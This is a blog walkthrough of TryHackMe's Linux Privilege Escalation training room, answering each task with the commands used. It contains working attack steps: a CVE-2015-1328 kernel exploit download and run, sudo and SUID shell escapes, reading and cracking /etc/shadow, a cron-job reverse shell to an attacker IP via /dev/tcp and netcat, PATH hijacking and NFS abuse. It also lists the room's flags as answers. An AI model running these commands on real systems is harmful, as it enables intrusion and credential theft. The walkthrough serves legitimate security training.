TryHackMe: Linux Privilege Escalation — Walkthrough

November 25, 2024
November 25, 2024 Jasper

TryHackMe: Linux Privilege Escalation — Walkthrough

Welcome to this walkthrough on the Linux Privilege Escalation Room on TryHackMe, a Medium level room in which we get to practice privilege escalation skills on Linux machines. This is a very essential skill for pentestings, and is a must for everyone working within cyber security. Let’s get going. But get strapped, it’s a long one!

Linux Privilege Escalation

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM.

Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Box URL: https://tryhackme.com/r/room/linprivesc


1. Introduction

Privilege escalation is a journey. There are no silver bullets, and much depends on the specific configuration of the target system. The kernel version, installed applications, supported programming languages, other users’ passwords are a few key elements that will affect your road to the root shell.

This room was designed to cover the main privilege escalation vectors and give you a better understanding of the process. This new skill will be an essential part of your arsenal whether you are participating in CTFs, taking certification exams, or working as a penetration tester.

Answer: No answer needed


2. What is Privilege Escalation?

No questions here, so just read the text on THM and move on.

Answer: No answer needed


3. Enumeration

What is the hostname of the target system?

It is time to start hacking :). 
Start up your AttackBox or if you prefer connect to the target machine by using OpenVPN, using the following command:

sudo openvpn <file_name>.ovpn

You then SSH into the target machine by using the provided credentials:

Username: karen

Password: Password1

We start out easy. To get the hostname of the target system we simply just use hostname command.

hostname
Finding the hostname

That’s a very easy command to remember isn’t it?

Answer: wade7363

What is the Linux kernel version of the target system?

Now it is time to find the Linux kernel version. The Linux kernel is the interface between the hardware and the computer processes running on Linux machines.

There are at least two different ways to find this mentioned in the room. We can either run:

uname -a

But we can also look at /proc/version, which may give us information on the kernel version and additional data such as whether a compiler (e.g. GCC) is installed.

cat /proc/version
uname -a and /proc/version both do the job

Both commands give the kernel version:

Answer: 3.13.0–24-generic

What Linux is this?

This one is easy as well. If you read the text you will know that systems can also be identified by looking at the /etc/issue file. This file usually contains some information about the operating system.

Run the following command:

cat /etc/issue
Reading /etc/issue

There you have the answer (just make sure you ignore the \n \l).

Answer: Ubuntu 14.04 LTS

What version of the Python language is installed on the system?

We’re doing great. Let’s keep up the momentum.

I don’t think this is mentioned in the text, but as someone with quite some Python development experience, I know we can simply run:

python --version
The python version

Alternatively, you can simply enter the Python interpreter by running python. This will show you the version as well.

Answer: 2.7.6

What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

Some simple googling on 3.13.0–24-generic will quickly bring you to a page mentioning CVE-2015–1328, such as:

Overlayfs Privilege Escalation
Rapid7’s VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.www.rapid7.com

That’s all for now. In the near future we will have to exploit this weakness.

Answer: CVE-2015–1328


4. Automated Enumeration Tools

Answer: No answer needed


5. Privilege Escalation: Kernel Exploits

Find and use the appropriate kernel exploit to gain root privileges on the target system.

There are a lot of different ways to exploit this kernel exploit.

I found and tested at least two, which I will cover here.

First, I tested the exploit found here:

PoC/CVE-2015-1328/CVE-2015-1328.c at master · DarkenCode/PoC
PoC collection. Contribute to DarkenCode/PoC development by creating an account on GitHub.github.com

Using this exploit consists of different steps:

  1. Downloading the .c file from github
    You can simply run: wget https://raw.githubusercontent.com/DarkenCode/PoC/refs/heads/master/CVE-2015-1328/CVE-2015-1328.c
Downloading the exploit

2. Setting executable permissions on the file

chmod +x CVE-2015–1328.c

3. Setting up a simple Python webserver on your machine:

python3 -m http.server
Setting up a simple web server

This starts a simple web server on port 8000.

4. Download the file to the target machine.

Now we need to download the file from your attacker machine. It is important to run these commands from the target machine. Before you fetch the file it is important to be in the /tmp directory so that you have permissions to “write” files.

cd /tmp
wget <attacker ip>:8000/CVE-2015-1328.c
Downloading from our web server

We got the file!

5. Compiling the .c code to a executable

Now we just following the exploit instructions. Compile the .c file and run it:

gcc CVE-2015-1328.c -o exploit

6. Running the executable

./exploit

That worked. And we got root!

Running the exploit

Now we need to find the flag with a quick find command:

find / -name flag1.txt 2>/dev/null
Finding the flag

Now we can simply read the flag, which is at /home/matt/flag1.txt.

Reading the flag

Pfew. We did it!

Alternatively, the Rapid7 article linked to earlier mentions a Metasploit module which you should be able to use.

msf > use exploit/linux/local/overlayfs_priv_esc 
msf exploit(overlayfs_priv_esc) > show targets
msf exploit(overlayfs_priv_esc) > set TARGET < target-id >
msf exploit(overlayfs_priv_esc) > show options
msf exploit(overlayfs_priv_esc) > exploit

Answer: No answer needed

What is the content of the flag1.txt file?

Answer: THM-28392872729920


6. Privilege Escalation: Sudo

How many programs can the user “karen” run on the target system with sudo rights?

We can use the sudo -l command to see which commands the karen user can run with sudo rights.

sudo -l
Checking our sudo rights

We see that there are three commands she can run as sudo: find, less and nano.

Answer: 3

What is the content of the flag2.txt file?

So, we found three programs which can Karen can run with sudo rights. The way to proceed now is looking at https://gtfobins.github.io/ to find some ways to abuse these rights to get escalated privileges.

If we search for find, we will come to the following page:

find | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It writes data to…gtfobins.github.io

Look for Sudo to find the following:

Try entering the following command:

sudo find . -exec /bin/sh \; -quit

This gives us root access:

We got root access!

Some looking around made me find the flag at /home/ubuntu:

We found the second flag!

Answer: THM-402028394

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

This question is similar to the previous one. If you go back to GTFOBins you can find the following page related to nmap:

nmap | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It can send back a…gtfobins.github.io

It describes the following code:

sudo nmap --interactive
nmap> !sh

Which is the expected answer!

Answer: sudo nmap — interactive

What is the hash of frank’s password?

If you have some basic knowledge you might know that the hashed passwords of users are found in /etc/shadow.

This requires root access to read, but you should have that from the previous tasks.

So just read the shadow file:

cat /etc/shadow
Reading the shadow file

There we have frank’s hash:

Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1


7. Privilege Escalation: SUID

Which user shares the name of a great comic book writer?

If you have read the text on THM’s room, you will know that the username are found in the /etc/passwd file. To read this, we need root privileges.

The tasks describes finding SUID and SGID files by running the following command:

find / -type f -perm -04000 -ls 2>/dev/null

Note: 2>/dev/null simply ensures that no error messages are shown and avoids your terminal being flooded.

The lists all files with SUID and SGID bits set:

Checking files with SUID and SGID bits set

If we look at our dear friend GTFOBins we have to find an executable that is represented on the following page:

GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured…gtfobins.github.io

We will see that base64 is on the list.

Click on base64 on GTFOBins and you will find a quick and easy way to exploit this:

https://gtfobins.github.io/gtfobins/base64

The command is as follows:

./base64 "$LFILE" | base64 --decode

To be able to answer the question we can read the /etc/passwd file like this:

/usr/bin/base64 /etc/passwd | base64 --decode
Abusing base64 to read /etc/passwd

The answer must be gerryconway, a famous Marvel Comics writer (among other things, the co-creator of the Punisher!).

Gerry Conway – Wikipedia
Gerard Francis Conway (born September 10, 1952) is an American comic book writer, comic book editor, science fiction…en.wikipedia.org

Answer: gerryconway

What is the password of user2?

To get the password of user2, we need to read the /etc/shadow file, as done previously.

Run the previous command, but now to read the /etc/shadow file:

/usr/bin/base64 /etc/shadow | base64 --decode

We find the following hash:

$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/

Finally, we can now use the unshadow tool to create a file crackable by John the Ripper. To achieve this, unshadow needs both the /etc/shadow and /etc/passwd files.

Before we can run this command we need to save the /etc/shadow file in a file called passwd.txt and the /etc/shadow file in a file called shadow.txt.

Make sure you are in /tmp and run the following commands:

/usr/bin/base64 /etc/passwd| base64 --decode > passwd.txt
/usr/bin/base64 /etc/shadow | base64 --decode > shadow.txt

Now we are ready to use unshadow, to create a file ready for john to crack. But we need to do this on our attacker machine. So I opted to manually copy the file contents in new files on the attacker machine.

Now run the following:

unshadow passwd.txt shadow.txt > passwords.txt
Unshadowing magic

Now we can use john to crack this passwords.txt file. Do so by running the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

This will start cracking the hashes:

Cracking the hashes

And there we found the password!

Answer: Password1

What is the content of the flag3.txt file?

We can now run the su command and change to user2.

Changing our user to user2

Now look for the flag:

find / -name flag3.txt 2>/dev/null
Trying to read flag 3!

I tried reading it, but I couldn’t!

I guess we need to use the old trick:

/usr/bin/base64 /home/ubuntu/flag3.txt | base64 --decode
Reading flag 3 with base64

There we go!

Answer: THM-3847834


8. Privilege Escalation: Capabilities

Complete the task described above on the target system

The command you have to run mentioned in the task is as follows:

getcap -r / 2>/dev/null

Which gives the following result:

Checking capabilities

Answer: No answer needed

How many binaries have set capabilities?

We can see in the screenshot above that there are 6 binaries with set capabilities.

Answer: 6

What other binary can be used through its capabilities?

If we look at GTFOBins again, we can see that view is listed as an executable which can be exploited through its capabilities.

View can be exploited in many ways

view | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It can send back a…gtfobins.github.io

GTFOBins mentions the following:

If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

cp $(which view) . 
sudo setcap cap_setuid+ep view

./view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

We will look at this in the following question, but for now we can the answer.

Answer: view

What is the content of the flag4.txt file?

We actually don’t need to use the first two lines of the script from GTFOBins, since we have a binary in a home directory with the proper capabilities. We can just manage with:

/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Notice the py3 instead of py.

This has given us root.

Reading flag numero 4!

Find the flag, and read it.

Answer: THM-9349843


9. Privilege Escalation: Cron Jobs

How many user-defined cron jobs can you see on the target system?

This one is easy is you read through the tab. We simply need to read the crontab file to see the user-defined cron jobs:

cat /etc/crontab
Checking crontab

We see 4 cron jobs.

Answer: 4

What is the content of the flag5.txt file?

There are many vulnerabilities related to these cronjobs. The backup.sh job is writable by karen, but run as root, which you see by running ls -la:

Backup.sh is writable!

The test.py and antivirus.sh scripts do not exist anymore, so we would also create one of these (the antivirus script can be created in the home directory, so that the cronjob can find it in its PATH). The test.py script can also be created by us in the /tmp directory.

I decided to edit the home/karen/backup.sh file. Start by editing the file:

nano /home/karen/backup.sh

Enter the following, but make sure you edit the ip. I tried using the example from the article but it did not work.

#!/bin/bash
bash -i >& /dev/tcp/<attacker ip>/1234 0>&1

# Alternative:
#mkfifo /tmp/f; nc <attacker ip> 1234 < /tmp/f | /bin/bash > /tmp/f 2>&1; rm /tmp/f

I made the script look like this:

Editing the script

One last thing: you need to give the backup.sh script executable permissions by running:

chmod +x backup.sh

Then, all that is left is to start a netcat listener on your attacker machine:

nc -lvnp 1234
Setting up a linstener, and receiving a connection

We got root!

But we need to find out where the flag is:

find / -name flag5.txt 2>/dev/null
Finding flag 5!

Read the flag:

Reading the fifth flag

There we go!

Answer: THM-383000283

What is Matt’s password?

We need to do the same thing as in an earlier task. Read the passwd and shadow files, copy to the attacker machine, unshadow the files, and run john on the result.

cat /etc/passwd > passwd.txt
cat /etc/shadow > shadow.txt

Now run the following:

unshadow passwd.txt shadow.txt > passwords.txt
Running unshadow once more

Now we can use john to crack this passwords.txt file. Do so by running the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Hmmm. I love the smell of cracked hashes in the morning

We found the answer!

Answer: 123456


10. Privilege Escalation: PATH

What is the odd folder you have write access for?

Let’s move on. We are getting quite close now!

To see the folders for which we have write access we can run the following command:

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

We see a lot of results, but the one that stands out to me is /home/murdoch.

Finding folders with write access

And yes, this is the answer THM expects.

Answer: /home/murdoch

Exploit the $PATH vulnerability to read the content of the flag6.txt file.

Now, to find a vulnerability, let’s have a look at the /home/murdoch/ folder. In it we find a test executable, and a python script, which both try to call an executable called thm.

Taking a look around

We know that we have access to the /home/murdoch/ folder, and this folder should now be added to the PATH. Do so by running this command:

export PATH=/home/murdoch:$PATH

Now, all we need is to create a thm file which reads the flag. This way we can ensure that the scripts call this new executable and give us the flag.

The flag is located at: /home/matt/flag6.txt (use previous techniques to find it, or just look around).

Now, we thm file we create can simply include a cat command to this location:

Making the script reading the sixth flag

Now, save the file, and try to run the test or thm.py file. This will fail with a permission denied message. This is because we need to give it executable rights:

chmod 777 thm

Now run this, and read the flag!

We read flag number 6!

Answer: No answer needed.

What is the content of the flag6.txt file?

Answer: THM-736628929


11. Privilege Escalation: NFS

Now it is time to enumerate for weaknesses in Network File Shares. This is the last new theory, so let’s get it over with.

How many mountable shares can you identify on the target system?

We can start by seeing “no_root_squash” vulnerability is present by looking at the configuration file:

cat /etc/exports
NFS config details

And indeed, the vulnerability exists, so we can proceed following THM rooms instruction on how to exploit this.

To find the total number of mountable shares on the target system, we can run the following command from your attacker machine:

showmount -e <target ip>
Showing mounts

We see three folders.

Answer: 3

How many shares have the “no_root_squash” option enabled?

We looked at this before. All three shares have “no_root_squash” enabled.

Answer: 3

Gain a root shell on the target system

Let’s keep on rolling. Create a folder in your /tmp directory for the mounting of the NFS share.

mkdir /tmp/nfs

cd /tmp/nfs

Then we can mount the drive:

mount -o rw <target ip>:/home/ubuntu/sharedfolder /tmp/nfs

Now create the script file:

nano shell
Creating a script

Save it. Now compile it with the following command:

gcc shell.c -o shell -w

Set the right permission:

chmod +s shell

Switch over to the target machine and run the shell executable. If you file does not show up make sure you copied it to the folder where you mounted your share. This makes it synchronise with the target machine, similar to how a service like Dropbox works.

Now we got root!

We got root again

Answer: No answer needed

What is the content of the flag7.txt file?

Now that we have root, we can acces the flag at /home/matt/flag7.txt:

Finding flag 7!

Answer: THM-89384012


12. Capstone Challenge

Pfew. We made it to the capstone challenge!

What is the content of the flag1.txt file?

I am going to go through the techniques learned in this room sequentially, until we find a method to use.

Unfortunately, we can’t use sudo — l. 
I tried printing the passwd files to see which users are on the system:

cat /etc/passwd | cut -d ":" -f 1^
Passwd entries

The shadow file is off limits though.

The history file is also not showing anything useful. Finding files that are readable, writable and executable by all uses does not show anything either.

find / -type f -perm 0777 2>/dev/null

Another try, look for files with the SUID bit:

find / -perm -u=s -type f 2>/dev/null

Here we found some interesting things:

Executables with SUID bit set

Now, we could misuse the SUID bit on the base64 executable, as we did before:

How to exploit base654
base64 /etc/shadow | base64 --decode
Reading the shadow file

This allows us to do the unshadow trick again, and cracking with john:

/usr/bin/base64 /etc/passwd| base64 --decode > passwd.txt
/usr/bin/base64 /etc/shadow | base64 --decode > shadow.txt

Now we are ready to use unshadow again,. Remember, we need to do this on our attacker machine. So I opted to manually copy the file contents in new files on the attacker machine. Finally, run the following:

unshadow passwd.txt shadow.txt > passwords.txt

Now we can use john to crack this passwords.txt file. Do so by running the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

This worked:

Cracking hashes again, again

Now we can change users to missy:

su missy

And type in her password.

Changing user to missy

If we search for the password we can find it now:

Finding the first flag

Read it:

Reading first flag

Answer: THM-42828719920544

What is the content of the flag2.txt file?

With that over it, we can check for more vulnerabilities. We lack root after all. Going through a similar process as before, I quickly found out something interesting while running sudo -l again:

Interesting sudo -l entries

Missy can run /usr/bin/find as root.

Where to find out how to abuse this? GTFOBins of course:

find | GTFOBins
It can be used to break out from restricted environments by spawning an interactive system shell. It writes data to…gtfobins.github.io

As mentioned:

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo find . -exec /bin/sh \; -quit

Let’s try to run this command ourselves. This caused some failures for me. Something was wrong with the “.” right after find. After some experimentation this worked for me:

sudo find -exec /bin/sh \; -quit

This gives us root:

We got root

The final flag can be found here:

Flag 2 found

Let’s read it:

Reading the second flag

Answer: THM-168824782390238

Congratulations:

WE DID IT!

BONUS:

I quicky found out that leonard also has write access to /etc/passwd:

Vulnerability in passwd file

This means we could have quickly added a new user, and hash a password with the following command:

openssl passwd 1234

If we add our username and hash in the same format as the other users, we could have quickly gained root!

Updating the passwd file

Change user to the new user:

Gaining root with our test user

Remember: there are nearly always many ways into a system!


Congratulations, we are done! I really loved this room and it really gave me a ton of new knowledge about privilege escalation. I hope you enjoyed it as much as I did! See you next time. Happy hacking!


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be even more grateful if you support me by buying me a cup of coffee:

Buy me a coffee

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

HTB Academy : Cybersecurity Training
Sign up for the best cybersecurity training courses and certifications! Enjoy browser-based interactive learning for…referral.hackthebox.com

Leave a Reply

Your email address will not be published. Required fields are marked *